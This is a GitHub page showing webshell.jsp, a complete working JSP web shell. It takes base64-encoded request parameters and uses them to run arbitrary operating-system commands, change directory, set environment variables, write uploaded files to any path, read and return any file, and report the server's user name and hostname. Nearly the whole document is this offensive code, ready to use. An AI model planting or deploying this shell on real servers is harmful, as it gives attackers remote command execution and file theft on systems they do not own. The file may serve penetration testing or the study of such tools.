-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathwebshell.jsp
122 lines (99 loc) · 3.69 KB
/
webshell.jsp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
<%@ page import="java.util.*,java.io.*,java.nio.file.*,java.util.regex.Pattern"%>
<%@ page trimDirectiveWhitespaces="true" %>
<%!
public String b64d(String b64) throws IOException
{
byte[] tmp = Base64.getDecoder().decode(b64);
return new String(tmp);
}
public void pb64(JspWriter out, String data, boolean sep) throws IOException
{
byte[] tmp = data.getBytes();
out.print(new String(Base64.getEncoder().encode(tmp)));
if (sep)
out.print(":");
}
public byte[] readInputStream(InputStream stream) throws IOException
{
int readCount;
byte[] buffer = new byte[4096];
ByteArrayOutputStream bos = new ByteArrayOutputStream();
while(( readCount = stream.read(buffer, 0, buffer.length)) != -1)
{
bos.write(buffer, 0, readCount);
}
return bos.toByteArray();
}
public void process(JspWriter out, HttpServletRequest request, HttpServletResponse response) throws IOException, InterruptedException
{
byte[] content;
String filename;
File cwd = new File(".");
Map<String, String> env = new HashMap<String,String>();
if (request.getParameter("chdir") != null)
{
cwd = new File(b64d(request.getParameter("chdir")));
if( !cwd.isDirectory() ) {
response.setStatus(202);
pb64(out, "Error: Unable to change directory to " + cwd.getAbsoluteFile(), false);
return;
}
}
if (request.getParameter("b64_env") != null)
{
for(String b64 : request.getParameter("b64_env").split(":"))
{
String[] envvar = b64d(b64).split("=");
if (envvar.length == 2)
env.put(envvar[0], envvar[1]);
}
}
if (request.getParameter("action") != null ) {
switch (request.getParameter("action"))
{
case "init":
pb64(out, File.separator, true);
pb64(out, "jsp", true);
pb64(out, System.getProperty("user.name"), true);
pb64(out, java.net.InetAddress.getLocalHost().getHostName(), true);
break;
case "cmd":
String[] command = b64d(request.getParameter("b64_cmd")).split("<@:SEP:@>");
ProcessBuilder builder = new ProcessBuilder(command);
builder.directory(cwd);
builder.environment().putAll(env);
builder.redirectErrorStream(true);
Process proc = builder.start();
proc.waitFor();
content = readInputStream(proc.getInputStream());
out.print(new String(Base64.getEncoder().encode(content)));
out.print(":");
break;
case "upload":
content = Base64.getDecoder().decode(request.getParameter("b64_upload"));
filename = b64d(request.getParameter("b64_filename"));
if (new File(filename).isDirectory())
filename += File.separator + b64d(request.getParameter("b64_orig"));
Files.write(Paths.get(filename), content);
break;
case "download":
filename = b64d(request.getParameter("b64_filename"));
content = Files.readAllBytes(Paths.get(filename));
out.print(new String(Base64.getEncoder().encode(content)));
out.print(":");
break;
}
}
pb64(out, cwd.getAbsoluteFile().toString(), false);
}
%>
<%
out.print(request.getParameter("pattern"));
try {
process(out, request, response);
} catch (IOException e) {
response.setStatus(201);
out.print("Caught unexpected " + e.getClass().getName() + ": " + e.getMessage());
}
out.print(request.getParameter("pattern"));
%>